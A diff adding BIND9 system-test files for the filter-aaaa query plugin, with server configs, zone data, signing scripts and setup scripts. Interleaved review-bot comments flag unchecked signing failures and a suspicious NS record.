@@ -0,0 +1,16 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +plugin query "../../../plugins/lib/filter-aaaa.so" { + filter-aaaa-on-v4 break-dnssec; +}; diff --git a/bin/tests/system/filter-aaaa/conf/good3.conf b/bin/tests/system/filter-aaaa/conf/good3.conf new file mode 100644 index 0000000..7aad386 --- /dev/null +++ b/bin/tests/system/filter-aaaa/conf/good3.conf @@ -0,0 +1,17 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +plugin query "../../../plugins/lib/filter-aaaa.so" { + filter-aaaa-on-v4 break-dnssec; + filter-aaaa { 1.0.0.0/8; }; +}; diff --git a/bin/tests/system/filter-aaaa/conf/good4.conf b/bin/tests/system/filter-aaaa/conf/good4.conf new file mode 100644 index 0000000..0161282 --- /dev/null +++ b/bin/tests/system/filter-aaaa/conf/good4.conf 
@@ -0,0 +1,17 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +plugin query "../../../plugins/lib/filter-aaaa.so" { + filter-aaaa-on-v4 yes; + filter-aaaa { 1.0.0.0/8; }; +}; diff --git a/bin/tests/system/filter-aaaa/conf/good5.conf b/bin/tests/system/filter-aaaa/conf/good5.conf new file mode 100644 index 0000000..a88b003 --- /dev/null +++ b/bin/tests/system/filter-aaaa/conf/good5.conf @@ -0,0 +1,19 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +view myview { + plugin query "../../../plugins/lib/filter-aaaa.so" { + filter-aaaa-on-v4 yes; + filter-aaaa { 1.0.0.0/8; }; + }; +}; diff --git a/bin/tests/system/filter-aaaa/ns1/named1.conf.in b/bin/tests/system/filter-aaaa/ns1/named1.conf.in new file mode 100644 index 0000000..381241a --- /dev/null +++ b/bin/tests/system/filter-aaaa/ns1/named1.conf.in 
@@ -0,0 +1,47 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.1; + notify-source 10.53.0.1; + transfer-source 10.53.0.1; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.1; }; + listen-on-v6 { fd92:7065:b8e:ffff::1; }; + recursion no; + dnssec-validation yes; + notify yes; + minimal-responses no; +}; + +acl filterees { 10.53.0.1; }; + +plugin query "../../../../plugins/lib/filter-aaaa.so" { + filter-aaaa-on-v4 yes; + filter-aaaa { filterees; }; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.1 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + + +zone "." { type primary; file "root.db"; }; +zone "signed" { type primary; file "signed.db.signed"; }; +zone "unsigned" { type primary; file "unsigned.db"; }; diff --git a/bin/tests/system/filter-aaaa/ns1/named2.conf.in b/bin/tests/system/filter-aaaa/ns1/named2.conf.in new file mode 100644 index 0000000..bebb8d0 --- /dev/null +++ b/bin/tests/system/filter-aaaa/ns1/named2.conf.in 
@@ -0,0 +1,44 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.1; + notify-source 10.53.0.1; + transfer-source 10.53.0.1; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.1; }; + listen-on-v6 { fd92:7065:b8e:ffff::1; }; + recursion no; + dnssec-validation yes; + notify yes; + minimal-responses no; +}; + +plugin query "../../../../plugins/lib/filter-aaaa.so" { + filter-aaaa-on-v6 yes; + filter-aaaa { fd92:7065:b8e:ffff::1; }; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.1 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +zone "." { type primary; file "root.db"; }; +zone "signed" { type primary; file "signed.db.signed"; }; +zone "unsigned" { type primary; file "unsigned.db"; }; diff --git a/bin/tests/system/filter-aaaa/ns1/root.db b/bin/tests/system/filter-aaaa/ns1/root.db new file mode 100644 index 0000000..150aa72 --- /dev/null +++ b/bin/tests/system/filter-aaaa/ns1/root.db 
@@ -0,0 +1,25 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 120 +@ SOA ns.utld hostmaster.ns.utld ( 1 3600 1200 604800 60 ) +@ NS ns.utld +ns.utld A 10.53.0.1 +ns.utld AAAA fd92:7065:b8e:ffff::1 +; + +signed NS ns.signed +ns.signed A 10.53.0.1 +ns.signed AAAA fd92:7065:b8e:ffff::1 + +unsigned NS ns.unsigned +ns.unsigned A 10.53.0.1 +ns.unsigned AAAA fd92:7065:b8e:ffff::1 diff --git a/bin/tests/system/filter-aaaa/ns1/sign.sh b/bin/tests/system/filter-aaaa/ns1/sign.sh new file mode 100755 index 0000000..71e5ecc --- /dev/null +++ b/bin/tests/system/filter-aaaa/ns1/sign.sh 
@@ -0,0 +1,35 @@
+#!/bin/sh
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+SYSTEMTESTTOP=../..
+. $SYSTEMTESTTOP/conf.sh
+
+SYSTESTDIR=filter-aaaa
+
+zone=signed.
+infile=signed.db.in
+zonefile=signed.db.signed
+outfile=signed.db.signed
+
+$KEYGEN -a $DEFAULT_ALGORITHM $zone 2>&1 > /dev/null | cat_i
+$KEYGEN -f KSK -a $DEFAULT_ALGORITHM $zone 2>&1 > keygen.out | cat_i
+keyname=`cat keygen.out`
+rm -f keygen.out
+
+keyfile_to_static_ds $keyname > trusted.conf
+cp trusted.conf ../ns2/trusted.conf
+cp trusted.conf ../ns3/trusted.conf
+cp trusted.conf ../ns5/trusted.conf
+
+$SIGNER -S -o $zone -f $outfile $infile > /dev/null 2> signer.err || cat signer.err
+echo_i "signed zone '$zone'"
diff --git a/bin/tests/system/filter-aaaa/ns1/signed.db.in b/bin/tests/system/filter-aaaa/ns1/signed.db.in
new file mode 100644
index 0000000..36a0373
--- /dev/null
+++ b/bin/tests/system/filter-aaaa/ns1/signed.db.in
@@ -0,0 +1,25 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 120
+@ SOA ns.signed. hostmaster.ns.signed. ( 1 3600 1200 604800 60 )
+@ NS ns
+@ MX 10 mx
+
+ns A 10.53.0.1
+ AAAA fd92:7065:b8e:ffff::1
+
+a-only NS 1.0.0.1
+aaaa-only AAAA 2001:db8::2
+dual A 1.0.0.3
+dual AAAA 2001:db8::3
+mx A 1.0.0.3
+mx AAAA 2001:db8::3
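Review bot: A failed `$SIGNER` run does not stop filter-aaaa/ns1/sign.sh: `... 2> signer.err || cat signer.err` only prints the error, after which `echo_i "signed zone '$zone'"` runs and the script exits 0, so the test would carry on with a missing or stale `signed.db.signed`. The two `$KEYGEN` calls are unchecked as well, and if `keygen.out` comes back empty the resulting `trusted.conf` is presumably unusable yet is still copied to ns2, ns3 and ns5 as their trust anchor. Suggest `|| { cat signer.err; exit 1; }` on the signer line and `[ -n "$keyname" ] || exit 1` before `keyfile_to_static_ds`. `zonefile` and `SYSTESTDIR` are assigned but not used in the visible lines. The ns4/sign.sh hunk further down has the same unchecked signer line.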
diff --git a/bin/tests/system/filter-aaaa/ns1/unsigned.db b/bin/tests/system/filter-aaaa/ns1/unsigned.db new file mode 100644 index 0000000..abc3947 --- /dev/null +++ b/bin/tests/system/filter-aaaa/ns1/unsigned.db @@ -0,0 +1,25 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 120 +@ SOA ns.unsigned. hostmaster.ns.unsigned. ( 1 3600 1200 604800 60 ) +@ NS ns +@ MX 10 mx + +ns A 10.53.0.1 + AAAA fd92:7065:b8e:ffff::1 + +a-only NS 1.0.0.4 +aaaa-only AAAA 2001:db8::5 +dual A 1.0.0.6 +dual AAAA 2001:db8::6 +mx A 1.0.0.3 +mx AAAA 2001:db8::3 diff --git a/bin/tests/system/filter-aaaa/ns2/hints b/bin/tests/system/filter-aaaa/ns2/hints new file mode 100644 index 0000000..fa0d3e4 --- /dev/null +++ b/bin/tests/system/filter-aaaa/ns2/hints @@ -0,0 +1,16 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 120 + +. NS ns.utld. +ns.utld. A 10.53.0.1 +ns.utld. AAAA fd92:7065:b8e:ffff::1 diff --git a/bin/tests/system/filter-aaaa/ns2/named1.conf.in b/bin/tests/system/filter-aaaa/ns2/named1.conf.in new file mode 100644 index 0000000..6cac8e5 --- /dev/null +++ b/bin/tests/system/filter-aaaa/ns2/named1.conf.in 
@@ -0,0 +1,44 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.2; + notify-source 10.53.0.2; + transfer-source 10.53.0.2; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.2; }; + listen-on-v6 { fd92:7065:b8e:ffff::2; }; + recursion yes; + dnssec-validation yes; + notify yes; + minimal-responses no; +}; + +plugin query "../../../../plugins/lib/filter-aaaa.so" { + filter-aaaa-on-v4 yes; + filter-aaaa { 10.53.0.2; }; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.2 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +zone "." { type hint; file "hints"; }; + +include "trusted.conf"; diff --git a/bin/tests/system/filter-aaaa/ns2/named2.conf.in b/bin/tests/system/filter-aaaa/ns2/named2.conf.in new file mode 100644 index 0000000..2107b7a --- /dev/null +++ b/bin/tests/system/filter-aaaa/ns2/named2.conf.in 
@@ -0,0 +1,44 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.2; + notify-source 10.53.0.2; + transfer-source 10.53.0.2; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.2; }; + listen-on-v6 { fd92:7065:b8e:ffff::2; }; + recursion yes; + dnssec-validation yes; + notify yes; + minimal-responses no; +}; + +plugin query "../../../../plugins/lib/filter-aaaa.so" { + filter-aaaa-on-v6 yes; + filter-aaaa { fd92:7065:b8e:ffff::2; }; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.2 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +zone "." { type hint; file "hints"; }; + +include "trusted.conf"; diff --git a/bin/tests/system/filter-aaaa/ns3/hints b/bin/tests/system/filter-aaaa/ns3/hints new file mode 100644 index 0000000..fa0d3e4 --- /dev/null +++ b/bin/tests/system/filter-aaaa/ns3/hints @@ -0,0 +1,16 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 120 + +. NS ns.utld. +ns.utld. A 10.53.0.1 +ns.utld. AAAA fd92:7065:b8e:ffff::1 diff --git a/bin/tests/system/filter-aaaa/ns3/named1.conf.in b/bin/tests/system/filter-aaaa/ns3/named1.conf.in new file mode 100644 index 0000000..cd156f4 
--- /dev/null +++ b/bin/tests/system/filter-aaaa/ns3/named1.conf.in @@ -0,0 +1,44 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.3; + notify-source 10.53.0.3; + transfer-source 10.53.0.3; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.3; }; + listen-on-v6 { fd92:7065:b8e:ffff::3; }; + recursion yes; + dnssec-validation yes; + notify yes; + minimal-responses no; +}; + +plugin query "../../../../plugins/lib/filter-aaaa.so" { + filter-aaaa-on-v4 break-dnssec; + filter-aaaa { 10.53.0.3; }; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.3 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +zone "." { type hint; file "hints"; }; + +include "trusted.conf"; diff --git a/bin/tests/system/filter-aaaa/ns3/named2.conf.in b/bin/tests/system/filter-aaaa/ns3/named2.conf.in new file mode 100644 index 0000000..6117849 --- /dev/null +++ b/bin/tests/system/filter-aaaa/ns3/named2.conf.in 
@@ -0,0 +1,44 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.3; + notify-source 10.53.0.3; + transfer-source 10.53.0.3; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.3; }; + listen-on-v6 { fd92:7065:b8e:ffff::3; }; + recursion yes; + dnssec-validation yes; + notify yes; + minimal-responses no; +}; + +plugin query "../../../../plugins/lib/filter-aaaa.so" { + filter-aaaa-on-v6 break-dnssec; + filter-aaaa { fd92:7065:b8e:ffff::3; }; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.3 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +zone "." { type hint; file "hints"; }; + +include "trusted.conf"; diff --git a/bin/tests/system/filter-aaaa/ns4/named1.conf.in b/bin/tests/system/filter-aaaa/ns4/named1.conf.in new file mode 100644 index 0000000..d47a71d --- /dev/null +++ b/bin/tests/system/filter-aaaa/ns4/named1.conf.in 
@@ -0,0 +1,44 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.4; + notify-source 10.53.0.4; + transfer-source 10.53.0.4; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.4; }; + listen-on-v6 { fd92:7065:b8e:ffff::4; }; + recursion no; + dnssec-validation no; + notify yes; + minimal-responses no; +}; + +plugin query "../../../../plugins/lib/filter-aaaa.so" { + filter-aaaa-on-v4 break-dnssec; + filter-aaaa { 10.53.0.4; }; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.4 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +zone "." { type primary; file "root.db"; }; +zone "signed" { type primary; file "signed.db.signed"; }; +zone "unsigned" { type primary; file "unsigned.db"; }; diff --git a/bin/tests/system/filter-aaaa/ns4/named2.conf.in b/bin/tests/system/filter-aaaa/ns4/named2.conf.in new file mode 100644 index 0000000..5a06ec3 --- /dev/null +++ b/bin/tests/system/filter-aaaa/ns4/named2.conf.in 
@@ -0,0 +1,44 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.4; + notify-source 10.53.0.4; + transfer-source 10.53.0.4; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.4; }; + listen-on-v6 { fd92:7065:b8e:ffff::4; }; + recursion no; + dnssec-validation no; + notify yes; + minimal-responses no; +}; + +plugin query "../../../../plugins/lib/filter-aaaa.so" { + filter-aaaa-on-v6 break-dnssec; + filter-aaaa { fd92:7065:b8e:ffff::4; }; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.4 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +zone "." { type primary; file "root.db"; }; +zone "signed" { type primary; file "signed.db.signed"; }; +zone "unsigned" { type primary; file "unsigned.db"; }; diff --git a/bin/tests/system/filter-aaaa/ns4/root.db b/bin/tests/system/filter-aaaa/ns4/root.db new file mode 100644 index 0000000..7984c37 --- /dev/null +++ b/bin/tests/system/filter-aaaa/ns4/root.db 
@@ -0,0 +1,24 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+@ SOA ns.utld hostmaster.ns.utld ( 1 3600 1200 604800 60 )
+@ NS ns.utld
+ns.utld A 10.53.0.4
+ns.utld AAAA fd92:7065:b8e:ffff::4
+;
+
+signed NS ns.signed
+ns.signed A 10.53.0.4
+ns.signed AAAA fd92:7065:b8e:ffff::4
+
+unsigned NS ns.unsigned
+ns.unsigned A 10.53.0.4
+ns.unsigned AAAA fd92:7065:b8e:ffff::4
diff --git a/bin/tests/system/filter-aaaa/ns4/sign.sh b/bin/tests/system/filter-aaaa/ns4/sign.sh
new file mode 100755
index 0000000..f07d85b
--- /dev/null
+++ b/bin/tests/system/filter-aaaa/ns4/sign.sh
@@ -0,0 +1,28 @@
+#!/bin/sh
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+SYSTEMTESTTOP=../..
+. $SYSTEMTESTTOP/conf.sh
+
+SYSTESTDIR=filter-aaaa
+
+zone=signed.
+infile=signed.db.in
+zonefile=signed.db.signed
+outfile=signed.db.signed
+
+$KEYGEN -a $DEFAULT_ALGORITHM $zone 2>&1 > /dev/null | cat_i
+$KEYGEN -f KSK -a $DEFAULT_ALGORITHM $zone 2>&1 > /dev/null | cat_i
+
+$SIGNER -S -o $zone -f $outfile $infile > /dev/null 2> signer.err || cat signer.err
+echo_i "signed zone '$zone'"
diff --git a/bin/tests/system/filter-aaaa/ns4/signed.db.in b/bin/tests/system/filter-aaaa/ns4/signed.db.in
new file mode 100644
index 0000000..fa52106
--- /dev/null
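Review bot: A failing `$SIGNER` run in ns4/sign.sh does not fail the script: `|| cat signer.err` prints the error and then yields cat's exit status, so even under `$SHELL -e` (which is how setup.sh invokes it) execution continues and `echo_i "signed zone '$zone'"` is still printed. The two `$KEYGEN` lines have the same property, because the pipeline's status is that of `cat_i`. I would end the signer line with `|| { cat signer.err; exit 1; }` so a broken signing step stops setup instead of surfacing later as unexplained test failures against an unsigned or stale zone. `zonefile` is assigned but never used in this script.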
+++ b/bin/tests/system/filter-aaaa/ns4/signed.db.in
@@ -0,0 +1,25 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 120
+@ SOA ns.signed. hostmaster.ns.signed. ( 1 3600 1200 604800 60 )
+@ NS ns
+@ MX 10 mx
+
+ns A 10.53.0.4
+ AAAA fd92:7065:b8e:ffff::4
+
+a-only NS 1.0.0.1
+aaaa-only AAAA 2001:db8::2
+dual A 1.0.0.3
+dual AAAA 2001:db8::3
+mx A 1.0.0.3
+mx AAAA 2001:db8::3
diff --git a/bin/tests/system/filter-aaaa/ns4/unsigned.db b/bin/tests/system/filter-aaaa/ns4/unsigned.db
new file mode 100644
index 0000000..4baa462
--- /dev/null
+++ b/bin/tests/system/filter-aaaa/ns4/unsigned.db
@@ -0,0 +1,25 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 120
+@ SOA ns.unsigned. hostmaster.ns.unsigned. ( 1 3600 1200 604800 60 )
+@ NS ns
+@ MX 10 mx
+
+ns A 10.53.0.4
+ AAAA fd92:7065:b8e:ffff::4
+
+a-only NS 1.0.0.4
+aaaa-only AAAA 2001:db8::5
+dual A 1.0.0.6
+dual AAAA 2001:db8::6
+mx A 1.0.0.3
+mx AAAA 2001:db8::3
diff --git a/bin/tests/system/filter-aaaa/ns5/hints b/bin/tests/system/filter-aaaa/ns5/hints
new file mode 100644
index 0000000..fa0d3e4
--- /dev/null
+++ b/bin/tests/system/filter-aaaa/ns5/hints
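Review bot: In signed.db.in the record `a-only NS 1.0.0.1` (and `a-only NS 1.0.0.4` in unsigned.db) has type NS with what looks like an IPv4 address as its target, so it is read as a delegation to the relative name `1.0.0.1` under the zone origin rather than as an address record. Given the label and its siblings `aaaa-only` and `dual`, `A` was probably intended: `a-only A 1.0.0.1` and `a-only A 1.0.0.4`. The part of tests.sh visible here never queries `a-only`, so nothing would catch this; if the delegation is deliberate, a one-line comment in each zone file saying so would help.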
@@ -0,0 +1,16 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 120
+
+. NS ns.utld.
+ns.utld. A 10.53.0.1
+ns.utld. AAAA fd92:7065:b8e:ffff::1
diff --git a/bin/tests/system/filter-aaaa/ns5/named.conf.in b/bin/tests/system/filter-aaaa/ns5/named.conf.in
new file mode 100644
index 0000000..0584bcf
--- /dev/null
+++ b/bin/tests/system/filter-aaaa/ns5/named.conf.in
@@ -0,0 +1,49 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ query-source address 10.53.0.5;
+ notify-source 10.53.0.5;
+ transfer-source 10.53.0.5;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.5; };
+ listen-on-v6 { fd92:7065:b8e:ffff::5; };
+ recursion yes;
+ dnssec-validation no;
+ notify yes;
+ dns64 64:ff9b::/96 {
+ clients { any; };
+ exclude { any; };
+ mapped { any; };
+ };
+ minimal-responses no;
+};
+
+plugin query "../../../../plugins/lib/filter-aaaa.so" {
+ filter-aaaa-on-v4 break-dnssec;
+ filter-aaaa { any; };
+};
+
+key rndc_key {
+ secret "1234abcd8765";
+ algorithm hmac-sha256;
+};
+
+controls {
+ inet 10.53.0.5 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
+
+zone "." { type hint; file "hints"; };
+
+include "trusted.conf";
diff --git a/bin/tests/system/filter-aaaa/prereq.sh b/bin/tests/system/filter-aaaa/prereq.sh
new file mode 100644
index 0000000..4b7058b
--- /dev/null
+++ b/bin/tests/system/filter-aaaa/prereq.sh
@@ -0,0 +1,27 @@
+#!/bin/sh
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+SYSTEMTESTTOP=..
+. $SYSTEMTESTTOP/conf.sh
+
+$FEATURETEST --have-dlopen || {
+ echo_i "dlopen() not supported - skipping filter-aaaa test"
+ exit 255
+}
+
+$FEATURETEST --tsan && {
+ echo_i "TSAN - skipping dlzexternal test"
+ exit 255
+}
+
+exit 0
diff --git a/bin/tests/system/filter-aaaa/setup.sh b/bin/tests/system/filter-aaaa/setup.sh
new file mode 100644
index 0000000..55ef60b
--- /dev/null
+++ b/bin/tests/system/filter-aaaa/setup.sh
@@ -0,0 +1,24 @@
+#!/bin/sh
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+SYSTEMTESTTOP=..
+. $SYSTEMTESTTOP/conf.sh
+
+copy_setports ns1/named1.conf.in ns1/named.conf
+copy_setports ns2/named1.conf.in ns2/named.conf
+copy_setports ns3/named1.conf.in ns3/named.conf
+copy_setports ns4/named1.conf.in ns4/named.conf
+copy_setports ns5/named.conf.in ns5/named.conf
+
+(cd ns1 && $SHELL -e sign.sh)
+(cd ns4 && $SHELL -e sign.sh)
